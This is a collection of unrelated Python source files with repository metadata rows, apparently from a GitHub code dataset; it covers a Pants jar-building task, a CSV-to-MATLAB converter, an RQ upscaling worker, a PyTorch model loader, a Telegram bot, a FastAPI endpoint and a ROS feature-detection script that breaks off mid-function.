from contextlib import contextmanager
import os
import tempfile
from twitter.common.collections import maybe_list
from twitter.common.lang import AbstractClass, Compatibility
from pants.backend.jvm.targets.jvm_binary import Duplicate, Skip, JarRules
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnit
from pants.java.jar.manifest import Manifest
from pants.util.contextutil import temporary_dir
class Jar(object):
  """Encapsulates operations to build up or update a jar file.

  Upon construction the jar is conceptually opened for writes. The write methods are called to
  add to the jar's contents and then changes are finalized with a call to close. If close is not
  called the staged changes will be lost.
  """

  class Error(Exception):
    """Indicates an error creating or updating a jar on disk."""

  class Entry(AbstractClass):
    """An entry to be written to a jar."""

    def __init__(self, dest):
      self._dest = dest

    @property
    def dest(self):
      """The destination path of the entry in the jar."""
      return self._dest

    @abstractmethod
    def materialize(self, scratch_dir):
      """Materialize this entry's source data into a filesystem path.

      :param string scratch_dir: A temporary directory that may be used to do any work required
        to materialize the entry as a source file. The caller is responsible for cleaning up
        `scratch_dir` after the jar is closed.
      :returns: The path to the source data.
      """

  class FileSystemEntry(Entry):
    """An entry backed by an existing file on disk."""

    def __init__(self, src, dest=None):
      super(Jar.FileSystemEntry, self).__init__(dest)
      self._src = src

    def materialize(self, _):
      # The source already lives on disk, so no scratch space is needed.
      return self._src

  class MemoryEntry(Entry):
    """An entry backed by an in-memory sequence of bytes."""

    def __init__(self, dest, contents):
      super(Jar.MemoryEntry, self).__init__(dest)
      self._contents = contents

    def materialize(self, scratch_dir):
      # Spill the in-memory bytes to a scratch file so the external jar tool can read them.
      fd, path = tempfile.mkstemp(dir=scratch_dir)
      try:
        os.write(fd, self._contents)
      finally:
        os.close(fd)
      return path

  def __init__(self):
    self._entries = []      # Staged Entry objects (manifest excluded).
    self._jars = []         # Paths of whole jars to graft into this jar.
    self._manifest = None   # Optional Entry targeting the manifest path.
    self._main = None       # Optional Main-Class manifest value.
    self._classpath = None  # Optional Class-Path manifest value.

  def main(self, main):
    """Specifies a Main-Class entry for this jar's manifest.

    :param string main: a fully qualified class name
    """
    if not main or not isinstance(main, Compatibility.string):
      raise ValueError('The main entry must be a non-empty string')
    self._main = main

  def classpath(self, classpath):
    """Specifies a Class-Path entry for this jar's manifest.

    :param list classpath: a list of paths
    """
    self._classpath = maybe_list(classpath)

  def write(self, src, dest=None):
    """Schedules a write of the file at ``src`` to the ``dest`` path in this jar.

    If the ``src`` is a file, then ``dest`` must be specified.

    If the ``src`` is a directory then by default all descendant files will be added to the jar as
    entries carrying their relative path. If ``dest`` is specified it will be prefixed to each
    descendant's relative path to form its jar entry path.

    :param string src: the path to the pre-existing source file or directory
    :param string dest: the path the source file or directory should have in this jar
    """
    if not src or not isinstance(src, Compatibility.string):
      raise ValueError('The src path must be a non-empty string, got %s of type %s.'
                       % (src, type(src)))
    if dest and not isinstance(dest, Compatibility.string):
      raise ValueError('The dest entry path must be a non-empty string, got %s of type %s.'
                       % (dest, type(dest)))
    if not os.path.isdir(src) and not dest:
      raise self.Error('Source file %s must have a jar destination specified' % src)
    self._add_entry(self.FileSystemEntry(src, dest))

  def writestr(self, path, contents):
    """Schedules a write of the file ``contents`` to the given ``path`` in this jar.

    :param string path: the path to write the contents to in this jar
    :param string contents: the raw byte contents of the file to write to ``path``
    """
    if not path or not isinstance(path, Compatibility.string):
      raise ValueError('The path must be a non-empty string')
    if contents is None or not isinstance(contents, Compatibility.bytes):
      raise ValueError('The contents must be a sequence of bytes')
    self._add_entry(self.MemoryEntry(path, contents))

  def _add_entry(self, entry):
    # The manifest entry is handed to the jar tool via its dedicated -manifest flag,
    # so it is tracked separately from ordinary entries.
    if Manifest.PATH == entry.dest:
      self._manifest = entry
    else:
      self._entries.append(entry)

  def writejar(self, jar):
    """Schedules all entries from the given ``jar``'s to be added to this jar save for the manifest.

    :param string jar: the path to the pre-existing jar to graft into this jar
    """
    if not jar or not isinstance(jar, Compatibility.string):
      raise ValueError('The jar path must be a non-empty string')
    self._jars.append(jar)

  @contextmanager
  def _render_jar_tool_args(self):
    """Yields the jar tool command line args for the staged changes.

    Materialized entries live in a temporary staging directory that is deleted when the
    context exits, so the yielded args must be consumed inside the context.
    """
    args = []

    if self._main:
      args.append('-main=%s' % self._main)

    if self._classpath:
      args.append('-classpath=%s' % ','.join(self._classpath))

    with temporary_dir() as stage_dir:
      if self._manifest:
        args.append('-manifest=%s' % self._manifest.materialize(stage_dir))

      if self._entries:
        def as_cli_entry(entry):
          # Entries with an explicit destination render as src=dest; bare sources as src.
          src = entry.materialize(stage_dir)
          return '%s=%s' % (src, entry.dest) if entry.dest else src
        args.append('-files=%s' % ','.join(map(as_cli_entry, self._entries)))

      if self._jars:
        args.append('-jars=%s' % ','.join(self._jars))

      yield args
class JarTask(NailgunTask):
  """A baseclass for tasks that need to create or update jars.

  All subclasses will share the same underlying nailgunned jar tool and thus benefit from fast
  invocations.
  """

  _CONFIG_SECTION = 'jar-tool'
  _JAR_TOOL_CLASSPATH_KEY = 'jar_tool'

  @staticmethod
  def _flag(bool_value):
    # Render a python bool as the literal the external jar tool expects.
    return 'true' if bool_value else 'false'

  # Maps pants Duplicate actions onto the jar tool's policy names.
  _DUPLICATE_ACTION_TO_NAME = {
    Duplicate.SKIP: 'SKIP',
    Duplicate.REPLACE: 'REPLACE',
    Duplicate.CONCAT: 'CONCAT',
    Duplicate.FAIL: 'THROW',
  }

  @classmethod
  def _action_name(cls, action):
    """Translate a Duplicate action constant into the jar tool's policy name.

    :raises ValueError: if the action is not a recognized duplicate action.
    """
    name = cls._DUPLICATE_ACTION_TO_NAME.get(action)
    if name is None:
      raise ValueError('Unrecognized duplicate action: %s' % action)
    return name

  def __init__(self, *args, **kwargs):
    super(JarTask, self).__init__(*args, **kwargs)
    self.set_distribution(jdk=True)
    # TODO(John Sirois): Consider poking a hole for custom jar-tool jvm args - namely for Xmx
    # control.
    self.register_jvm_tool_from_config(self._JAR_TOOL_CLASSPATH_KEY, self.context.config,
                                       ini_section=self._CONFIG_SECTION,
                                       ini_key='bootstrap-tools',
                                       default=['//:jar-tool'])

  @property
  def config_section(self):
    return self._CONFIG_SECTION

  def prepare(self, round_manager):
    # Require the products JarBuilder consumes so upstream tasks populate them first.
    round_manager.require_data('resources_by_target')
    round_manager.require_data('classes_by_target')

  @contextmanager
  def open_jar(self, path, overwrite=False, compressed=True, jar_rules=None):
    """Yields a Jar that will be written when the context exits.

    :param string path: the path to the jar file
    :param bool overwrite: overwrite the file at ``path`` if it exists; ``False`` by default; ie:
      update the pre-existing jar at ``path``
    :param bool compressed: entries added to the jar should be compressed; ``True`` by default
    :param jar_rules: an optional set of rules for handling jar exclusions and duplicates
    """
    jar = Jar()
    try:
      yield jar
    except jar.Error as e:
      raise TaskError('Failed to write to jar at %s: %s' % (path, e))

    with jar._render_jar_tool_args() as args:
      if args:  # Don't build an empty jar
        args.append('-update=%s' % self._flag(not overwrite))
        args.append('-compress=%s' % self._flag(compressed))

        jar_rules = jar_rules or JarRules.default()
        args.append('-default_action=%s' % self._action_name(jar_rules.default_dup_action))

        skip_patterns = []
        duplicate_actions = []

        for rule in jar_rules.rules:
          if isinstance(rule, Skip):
            skip_patterns.append(rule.apply_pattern)
          elif isinstance(rule, Duplicate):
            duplicate_actions.append('%s=%s' % (rule.apply_pattern.pattern,
                                                self._action_name(rule.action)))
          else:
            raise ValueError('Unrecognized rule: %s' % rule)

        if skip_patterns:
          args.append('-skip=%s' % ','.join(p.pattern for p in skip_patterns))

        if duplicate_actions:
          args.append('-policies=%s' % ','.join(duplicate_actions))

        args.append(path)

        jvm_args = self.context.config.getlist('jar-tool', 'jvm_args', default=['-Xmx64M'])
        self.runjava(self.tool_classpath(self._JAR_TOOL_CLASSPATH_KEY),
                     'com.twitter.common.jar.tool.Main',
                     jvm_options=jvm_args,
                     args=args,
                     workunit_name='jar-tool',
                     workunit_labels=[WorkUnit.TOOL, WorkUnit.JVM, WorkUnit.NAILGUN])

  class JarBuilder(AbstractClass):
    """A utility to aid in adding the classes and resources associated with targets to a jar."""

    @staticmethod
    def _write_agent_manifest(agent, jar):
      """Write a java agent manifest for *agent* into *jar*."""
      # TODO(John Sirois): refactor an agent model to support 'Boot-Class-Path' properly.
      manifest = Manifest()
      manifest.addentry(Manifest.MANIFEST_VERSION, '1.0')
      if agent.premain:
        manifest.addentry('Premain-Class', agent.premain)
      if agent.agent_class:
        manifest.addentry('Agent-Class', agent.agent_class)
      if agent.can_redefine:
        manifest.addentry('Can-Redefine-Classes', 'true')
      if agent.can_retransform:
        manifest.addentry('Can-Retransform-Classes', 'true')
      if agent.can_set_native_method_prefix:
        manifest.addentry('Can-Set-Native-Method-Prefix', 'true')
      jar.writestr(Manifest.PATH, manifest.contents())

    @abstractproperty
    def _context(self):
      """Implementations must supply a context."""

    def add_target(self, jar, target, recursive=False):
      """Adds the classes and resources for a target to an open jar.

      :param jar: An open jar to add to.
      :param target: The target to add generated classes and resources for.
      :param bool recursive: `True` to add classes and resources for the target's transitive
        internal dependency closure.
      :returns: The list of targets that actually contributed classes or resources or both to the
        jar.
      """
      classes_by_target = self._context.products.get_data('classes_by_target')
      resources_by_target = self._context.products.get_data('resources_by_target')

      targets_added = []

      def add_to_jar(tgt):
        target_classes = classes_by_target.get(tgt)

        target_resources = []

        # TODO(pl): https://github.com/pantsbuild/pants/issues/206
        resource_products_on_target = resources_by_target.get(tgt)
        if resource_products_on_target:
          target_resources.append(resource_products_on_target)

        if tgt.has_resources:
          target_resources.extend(resources_by_target.get(r) for r in tgt.resources)

        if target_classes or target_resources:
          targets_added.append(tgt)

          def add_products(target_products):
            # Each product maps a root dir to relative paths; the relative path doubles
            # as the jar entry path.
            if target_products:
              for root, products in target_products.rel_paths():
                for prod in products:
                  jar.write(os.path.join(root, prod), prod)

          add_products(target_classes)
          for resources_target in target_resources:
            add_products(resources_target)

          if tgt.is_java_agent:
            self._write_agent_manifest(tgt, jar)

      if recursive:
        target.walk(add_to_jar)
      else:
        add_to_jar(target)

      return targets_added

  def prepare_jar_builder(self):
    """Prepares a ``JarTask.JarBuilder`` for use during ``execute``.

    This method should be called during task preparation to ensure the classes and resources needed
    for jarring targets are mapped by upstream tasks that generate these.
    """
    # Close over self so the builder can expose this task's context via _context.
    class PreparedJarBuilder(self.JarBuilder):
      @property
      def _context(me):
        return self.context
    return PreparedJarBuilder()
| fakeNetflix/square-repo-pants | src/python/pants/backend/jvm/tasks/jar_task.py | jar_task.py | py | 12,978 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "twitter.common.lang.AbstractClass",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "abc.abstractmethod",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "tempfile.mkstemp",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": ... |
22016755038 | import pandas as pd
import numpy as np
from scipy.io import savemat
import os
def csv_to_spm_vectors(csv_path):
    """Convert onset/duration CSV exports under *csv_path* into SPM-style .mat files.

    Each ``*.csv`` file (';'-delimited) must have 'onsets' and 'durations'
    columns whose cells hold bracketed number strings (e.g. ``"[1.0 2.5]"``).
    At least four onset rows and two duration rows are expected. For every
    subject a ``<sub>_vectors.mat`` file with a single ``vectors`` struct is
    written into ``csv_path``.

    :param csv_path: directory to scan recursively for CSV files.
    """
    for root, dirs, files in os.walk(csv_path):
        for name in files:
            if not name.endswith(".csv"):
                continue
            csv_file = os.path.join(root, name)
            df = pd.read_csv(csv_file, delimiter=";")
            # Subject id: last six characters of the file name (without extension).
            # Deriving it from `name` (not the full path) fixes the original
            # csv_file[-10:-4] slice, which bled into directory characters for
            # short file names.
            sub_name = os.path.splitext(name)[0][-6:]
            for key in ("onsets", "durations"):
                for ii in range(len(df[key])):
                    # Strip newlines/commas and the surrounding brackets, then parse
                    # the remaining whitespace-separated numbers.
                    raw = df[key][ii].replace("\n", "").replace(",", "")[1:-1]
                    tokens = [tok for tok in raw.split(" ") if tok]
                    # .at avoids the pandas chained-assignment pitfall of df[key][ii] = ...
                    df.at[ii, key] = np.array(tokens, dtype=np.float64)
            new_dict = {
                "sub": sub_name,
                "sync_onset": df["onsets"][0],
                "osync_onset": df["onsets"][1],
                "mine_onset": df["onsets"][2],
                "other_onset": df["onsets"][3],
                "sync_duration": df["durations"][0],
                "osync_duration": df["durations"][1],
            }
            # os.path.join fixes the original bare concatenation (csv_path + sub_name),
            # which produced a broken path when csv_path lacked a trailing separator.
            output_name = os.path.join(csv_path, sub_name + "_vectors.mat")
            savemat(output_name, {"vectors": new_dict})
{
"api_name": "os.walk",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line_number":... |
1409824498 | import threading
import time
from subprocess import Popen, PIPE, CalledProcessError
from redis import Redis
from rq import Queue
import sys
import os
import shutil
# Connect to Redis
redis_conn = Redis(host='localhost', port=6379, db=0)
# Create an RQ queue
queue = Queue(connection=redis_conn)
def read_output(pipe, task_id):
    """Stream lines from *pipe* into the RQ job's meta for live progress polling.

    The full transcript accumulated so far is stored under
    ``job.meta['progress']`` after every line read.
    """
    job = queue.fetch_job(task_id)
    collected = []
    for line in iter(pipe.readline, ''):
        collected.append(line)
        sys.stderr.flush()
        # Persist the transcript-so-far so clients polling the job see progress.
        job.meta['progress'] = ''.join(collected)
        job.save_meta()
def task(task_id, input_path, output_path, model_name, tta=False):
    """Run the upscayl binary on *input_path*, streaming its output into job meta.

    :param task_id: RQ job id used by read_output to record progress.
    :param input_path: image to upscale; its parent directory is removed afterwards.
    :param output_path: destination for the upscaled image.
    :param model_name: model passed to the binary's ``-n`` flag.
    :param tta: when True, add the ``-x`` flag.
    :raises CalledProcessError: if the upscaler exits with a non-zero status.
    """
    cmd = ['./upscale/upscayl', '-i', input_path, '-o', output_path, '-n', model_name]
    if tta:
        cmd.append('-x')
    try:
        with Popen(cmd, stderr=PIPE, stdout=PIPE, bufsize=1, universal_newlines=True) as proc:
            # Drain stdout and stderr concurrently so neither pipe can block the process.
            readers = [
                threading.Thread(target=read_output, args=(proc.stdout, task_id)),
                threading.Thread(target=read_output, args=(proc.stderr, task_id)),
            ]
            for reader in readers:
                reader.start()
            proc.wait()
            for reader in readers:
                reader.join()
            if proc.returncode != 0:
                raise CalledProcessError(proc.returncode, proc.args)
    finally:
        # Clean up the whole upload directory whether processing succeeded or failed.
        if os.path.exists(input_path):
            shutil.rmtree(os.path.dirname(input_path))
| ASparkOfFire/fastapi-rq-example | job.py | job.py | py | 1,772 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "redis.Redis",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "rq.Queue",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.stderr.flush",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sys.stderr",
"line_number":... |
23164271375 | from PIL import Image, ImageOps
import cv2
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
import time
import pandas as pd
# import json
from IPython.display import clear_output
torch.set_printoptions(linewidth=120)
torch.set_grad_enabled(True)
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
class Network(nn.Module):
    """Small CNN classifier: two conv/pool stages followed by two hidden FC layers.

    Takes single-channel 48x48 inputs and emits logits over 7 classes.
    """

    def __init__(self):
        super().__init__()
        self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5)
        self.conv2 = nn.Conv2d(in_channels=6, out_channels=12, kernel_size=5)
        self.fc1 = nn.Linear(in_features=12*9*9, out_features=120)
        self.fc2 = nn.Linear(in_features=120, out_features=60)
        self.out = nn.Linear(in_features=60, out_features=7)

    def forward(self, t):
        # Stage 1: conv (48 -> 44) + relu, then 2x2 max-pool (44 -> 22).
        t = F.max_pool2d(F.relu(self.conv1(t)), kernel_size=2, stride=2)
        # Stage 2: conv (22 -> 18) + relu, then 2x2 max-pool (18 -> 9).
        t = F.max_pool2d(F.relu(self.conv2(t)), kernel_size=2, stride=2)
        # Flatten the 12x9x9 feature maps and run the classifier head.
        t = t.reshape(-1, 12*9*9)
        t = F.relu(self.fc1(t))
        t = F.relu(self.fc2(t))
        return self.out(t)
class webopencv(object):
    """Thin wrapper whose process() re-saves a pickled model as a state dict."""

    def __init__(self):
        # No instance state needed; kept for call-site compatibility.
        pass

    def process(self):
        # Load the fully-serialized model and persist only its parameters.
        # NOTE(review): torch.load of a whole model object requires the model's
        # class (presumably Network above) to be importable -- confirm.
        model = torch.load("modelResults.pt")
        torch.save(model.state_dict(), "model_state_dict.pt")
# Script entry: convert the checkpoint immediately on import/run.
# NOTE(review): consider guarding with `if __name__ == "__main__":` so importing
# this module does not trigger file I/O.
w = webopencv()
w.process()
| jain-aniket/attentiveness-flask | testtorchloading.py | testtorchloading.py | py | 1,388 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.set_printoptions",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.set_grad_enabled",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "cv2.CascadeClassifier",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "c... |
74431864103 | from fastapi import FastAPI
import requests
import uvicorn
app = FastAPI()
@app.get("/")
async def get_product():
req=requests.get("https://world.openfoodfacts.org/api/v0/product/3033491270864.json")
if req.status_code==200:
res=req.json()
return(res)
if __name__=='__main__':
    # Run a local development server when executed directly.
    uvicorn.run(app, host="127.0.0.1", port=8000)
{
"api_name": "fastapi.FastAPI",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "uvicorn.run",
"line_number": 14,
"usage_type": "call"
}
] |
6369818660 | '''
This script compiles the requirements for the bot and runs it on a loop
It should also contain the functions of the bot
'''
from config import *
from core import *
import telegram
import datetime
import time
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, \
ConversationHandler, CallbackQueryHandler
import logging
import random
from pytz import timezone
import emojis
import argparse
import utils.db_utils as db_utils
import argparse
print('initialising')
# Checks whether this should be run in the testing environment.
parser = argparse.ArgumentParser(description='Runs the leobot service')
# NOTE(review): argparse `type=bool` treats any non-empty string as True;
# confirm that e.g. `-t false` is never expected to disable testing mode.
parser.add_argument('-t', '--testing', type=bool, help='Whether you want to run in testing env')
args = parser.parse_args()
# setting up deployment environment env (REMOVE IF YOU ARE NOT USING env FILE BUT IT IS GOOD PRACTICE)
testing = args.testing
print('Testing value:', testing)
import configparser
config = configparser.ConfigParser()
config.read('bot.cfg')
# Select bot credentials and database according to the environment.
if testing:
    bot_config = dict(config['test_bot'])
    print(str(config))
    dbi = db_utils.Database(config, 'test_db')
else:
    bot_config = config['live_bot']
    dbi = db_utils.Database(config, 'live_db')
# TODO: ACTUAL DEPLOYMENT CHANGE
owner = config['owners']['fei']
updater = Updater(token=bot_config['token'], use_context=True)
dispatcher = updater.dispatcher  # for quicker access to the dispatcher object
jobqueuer = updater.job_queue  # for quicker access to JobQueue object
# Logs problems to storage/error_log.txt with level INFO.
logging.basicConfig(filename='storage/error_log.txt', format='%(asctime)s - %(name)s - \
%(levelname)s - %(message)s', level=logging.INFO)
print('finish setting up logging')
core_utils.setup_bot_data(dispatcher, owner, bot_config, dbi, testing)
msg_return = dispatcher.bot.send_message(owner, bot_init_msg)  # informs the owners that it is initialised
print('Message Return', str(msg_return))
################
# TESTING ZONE #
################
# dbi.new_category('Testimony', des= 'Heartfelt personal sharing')
# dbi.cat_id('Testimony')
# def process_members(update, context):
# '''
# Processes the changes in member data i.e. when the user first starts the bot.
# This function being in group 0 make sure it is the highest priority and runs in parallel with other
# callback functions
# '''
# # for easier access to user_id
# user_id = update.message.from_user.id
# # initiates the user if it is his first time
# initiate_user(user_id, update, context) # in utils
# # updates the permission according to quits by the coder
# # check_for_personal_changes(update, context)
# dispatcher.add_handler(MessageHandler(Filters.text, process_members), group=0) # gives most prirority
# Conversation for composing a new forum thread:
# title -> category -> body -> optional file -> tags -> terms & conditions.
new_thread_conv = ConversationHandler(
    entry_points=[CommandHandler('new_thread', new_thread)],
    states={
        TITLE: [MessageHandler(Filters.text & ~Filters.command, t_title)],
        CAT: [MessageHandler(Filters.text & ~Filters.command, t_cat)],
        BODY: [MessageHandler(Filters.text & ~Filters.command, t_body)],
        FILE: [core_utils.file_handler(t_file),
               CommandHandler('no', t_file)],
        TAGS: [MessageHandler(Filters.text & ~Filters.command, t_tags)],
        TC: [MessageHandler(Filters.text & ~Filters.command, tc_next)]
    },
    fallbacks=[CommandHandler('cancel', cancel),
               CommandHandler('end', end)],
    # Nested conversation: terminal states are mapped back into the parent menu.
    map_to_parent={
        COMPLETED: MENU,
        END: END,
        CANCEL: MENU
    }
)

# Conversation for submitting feedback: title -> body -> optional file.
feedback_conv = ConversationHandler(
    entry_points=[CommandHandler('feedback', fb_init)],
    states={
        TITLE: [MessageHandler(Filters.text & ~Filters.command, \
            fb_title)],
        BODY: [MessageHandler(Filters.text & ~Filters.command, fb_body)],
        FILE: [core_utils.file_handler(fb_file),
               CommandHandler('no', fb_file)]
    },
    fallbacks=[CommandHandler('cancel', cancel),
               CommandHandler('end', end)],
    map_to_parent={
        COMPLETED: MENU,
        END: END,
        CANCEL: MENU
    }
)

# Admin-only menu exposing moderation and membership commands.
admin_conv = ConversationHandler(
    entry_points=[CommandHandler('admin_menu', admin_menu)],
    states={
        MENU: [CommandHandler('sview_fb', sview_fb),
               CommandHandler('dview_fb', dview_fb),
               CommandHandler('ch_perm', ch_perm),
               CommandHandler('all_members', all_members),
               CommandHandler('del_threads', del_threads)
               ],
    },
    fallbacks=[CommandHandler('quit', quit_m),
               CommandHandler('end', end)],
    map_to_parent={
        END: END,
        QUIT: MENU
    }
)

# Backend menu skeleton.
# NOTE(review): be_conv has an empty MENU state and is never registered on the
# dispatcher or nested in start_conv -- confirm whether it is still needed.
be_conv = ConversationHandler(
    entry_points=[CommandHandler('backend', admin_menu)],
    states={
        MENU: [],
    },
    fallbacks=[CommandHandler('quit', quit_m),
               CommandHandler('end', end)],
    map_to_parent={
        END: END,
        QUIT: MENU
    }
)

# Top-level conversation: /start opens the menu hosting the nested conversations.
start_conv = ConversationHandler(
    entry_points=[CommandHandler('start', start)],
    states={
        MENU: [
            new_thread_conv,
            feedback_conv,
            admin_conv,
        ],
        END: [CommandHandler('start', start)],
        TIMEOUT: [MessageHandler(Filters.text, timeout)]
    },
    fallbacks=[CommandHandler('end', end)],
    conversation_timeout=600  # end idle conversations after 10 minutes
)

# def not_command(update, context):
#     '''
#     Processes messages that are not commands i.e. a response to a prompt by the bot
#     Make sure this is the last callback function to grant lowest priority to because this means that
#     the person is clearly not trying to call another function
#     '''
#     update.message.reply_text('Not real command')
# dispatcher.add_handler(MessageHandler(Filters.command, not_command), group=1)

# Register stand-alone commands and the main conversation.
dispatcher.add_handler(CommandHandler('help', help_fns))
dispatcher.add_handler(CommandHandler('cache', cache))
dispatcher.add_handler(start_conv)
def remind_events(context):
    """Daily job callback: send the daily message to the owners.

    TODO: Make bot record events and remind people.
    """
    inform_owners(daily_msg, context)
# Schedule the daily reminder for 08:00 Singapore time.
event_reminder = jobqueuer.run_daily(callback=remind_events,\
    time=datetime.time(8, 0, 0, 0, tzinfo=timezone('Singapore')))
# Start long-polling Telegram for updates (non-blocking).
updater.start_polling()
# NOTE(review): dbi.close() runs immediately after start_polling returns, so
# handlers may later touch a closed DB handle -- confirm this is intended.
dbi.close()
| ollayf/leobot | main.py | main.py | py | 6,203 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "configparser.ConfigParser",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "config.read",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "utils.d... |
30922250366 | #!/usr/bin/env python
# from __future__ import division
import numpy as np
import message_filters
from matplotlib import pyplot as plt
import imutils
from time import time, sleep
# import os
from sensor_msgs.msg import Image
from geometry_msgs.msg import Point, Pose, Quaternion, Vector3
from cv_bridge import CvBridge, CvBridgeError
import rospy
import copy
# import stereoDepth as SD
# from sklearn import linear_model, datasets
from nav_msgs.msg import Odometry # We need this message type to read position and attitude from Bebop nav_msgs/Odometry
from geometry_msgs.msg import Twist
from geometry_msgs.msg import Point
from std_msgs.msg import Empty
# import PlaneRANSAC as PR
from itertools import compress
import tf
from optic_flow_example.msg import OpticFlowMsg
import cPickle
import sys
# from pykalman import UnscentedKalmanFilter
# from robust_kalman import RobustKalman
# from robust_kalman.utils import HuberScore, VariablesHistory, WindowStatisticsEstimator
from sklearn.cluster import KMeans
# from sklearn.linear_model import RANSACRegressor
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')
keypoints = cPickle.loads(open("./keypoints.txt").read())
kp = []
for point in keypoints:
temp = cv2.KeyPoint(x=point[0][0],y=point[0][1],_size=point[1], _angle=point[2], _response=point[3], _octave=point[4], _class_id=point[5])
kp.append(temp)
des_img_des = np.loadtxt('descriptors.txt', dtype = float)
a = des_img_des
# a1 = np.loadtxt('descriptors1.txt', dtype = float)
rolavnum = 4
it = 0
# Rolling average
xarr = np.zeros(rolavnum)
yarr = np.zeros(rolavnum)
flow_x = 0
flow_y = 0
# Camera focal length [pixel]
f = 202
# Stereo base distance [mm]
B = 30
prev_time = 0
x_prev = 0
y_prev = 0
prev_image = None
last_time = 0
lk_params = dict( winSize = (15,15),
maxLevel = 2,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
bridge = CvBridge()
points_to_track = []
center_pub = rospy.Publisher("/wall_center_point",Point)
contours_pub = rospy.Publisher('/mask', Image, queue_size=1)
def totuple(a):
    """Recursively convert a nested iterable (e.g. a numpy array) to nested tuples.

    Non-iterable leaves are returned unchanged.
    """
    try:
        converted = tuple(totuple(element) for element in a)
    except TypeError:
        # `a` is a scalar leaf -- return it as-is.
        return a
    return converted
def defpoints(image, spacing):
    """Build a regular grid of (col, row) tracking points over *image*.

    :param image: 2D array whose shape defines the grid extent.
    :param spacing: pixel step between grid points.
    :returns: float32 array of shape (npoints, 1, 2), the layout OpenCV's
        optical-flow routines expect.
    """
    rows, cols = image.shape[0], image.shape[1]
    grid = [[y, x]
            for x in range(0, rows, spacing)
            for y in range(0, cols, spacing)]
    pts = np.array(grid, dtype=np.float32)
    # Reshape to (npoints, 1, 2) as required by cv2.calcOpticalFlowPyrLK-style APIs.
    return pts.reshape(pts.shape[0], 1, pts.shape[1])
def writeOdom(data):
    """Odometry subscriber callback: cache the latest pose and velocity in globals."""
    global global_pos
    global global_vel
    global_pos=data.pose.pose
    global_vel=data.twist.twist
def rundetection():
    """Initialize the ROS node, synchronized image subscribers and odometry, then spin."""
    rospy.init_node('feature_detection', anonymous=True)
    # NOTE(review): both subscribers listen to the same topic -- presumably a stereo
    # placeholder; confirm the intended left/right camera topics.
    right_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo1)#,queue_size=4)
    left_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo2)#,queue_size=4)
    rospy.Subscriber('/bebop/odom', Odometry, writeOdom)
    ts = message_filters.TimeSynchronizer([left_sub,right_sub],10)
    # ts.registerCallback(OpticalFlow)
    ts.registerCallback(PoseEstimate)
    rospy.spin()
def featuredetect(img):
    """Detect SURF keypoints and descriptors in *img*.

    :returns: tuple (keypoints, descriptors).
    """
    numFeatures = 500  # passed to SURF_create; presumably the Hessian threshold -- confirm.
    surf = cv2.xfeatures2d.SURF_create(numFeatures)
    kp, des = surf.detectAndCompute(img,None)
    # draw only keypoints location,not size and orientation
    img2 = cv2.drawKeypoints(img,kp,None,color=(0,255,0), flags=0)  # NOTE(review): img2 is unused.
    return kp, des
def featurecompare(des1, des2):
    """kNN-match (k=2) two descriptor sets with FLANN; returns raw match pairs.

    The two candidates per query enable a downstream Lowe ratio test.
    """
    matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED)
    # FLANN requires float32 descriptors, hence the asarray conversions.
    matches = matcher.knnMatch(np.asarray(des1,np.float32),np.asarray(des2,np.float32), 2) #2
    return matches
def plotter(image, points, points1, points2, cc, col, col1, col2):
    """Draw three groups of circle markers on *image* and return the annotated image.

    :param points: iterable of (x, y) drawn in color ``col``.
    :param points1: iterable of (x, y) drawn in color ``col1``.
    :param points2: a single (x, y) pair drawn in color ``col2`` (not a sequence of pairs).
    :param cc: 0 means *image* is grayscale and is converted to BGR first.
    """
    color_img = image
    if cc == 0:
        color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
    color = col # bgr colorspace
    color1 = col1
    color2 = col2
    linewidth = 3
    for x,y in points:
        cv2.circle(color_img, (int(x),int(y)), 5 , color, thickness = linewidth)  # marker for group 1
    for x,y in points1:
        cv2.circle(color_img, (int(x),int(y)), 5 , color1, thickness = linewidth)  # marker for group 2
    # for x,y in points2:
    cv2.circle(color_img, (int(points2[0]),int(points2[1])), 5 , color2, thickness = linewidth)  # single marker
    return color_img
    # Dead display code kept from earlier debugging:
    # plt.cla()
    # # plt.plot(color_img)
    # plt.imshow(color_img)
    # # plt.show()
    # plt.pause(0.05)
    # cv2.imshow('tracked image',color_img)
    # cv2.waitKey(1)
def plotavg(image, point, cc):
    """Display *image* via matplotlib with a single green circle at *point*.

    :param cc: 0 means the grayscale input is converted to BGR first.
    """
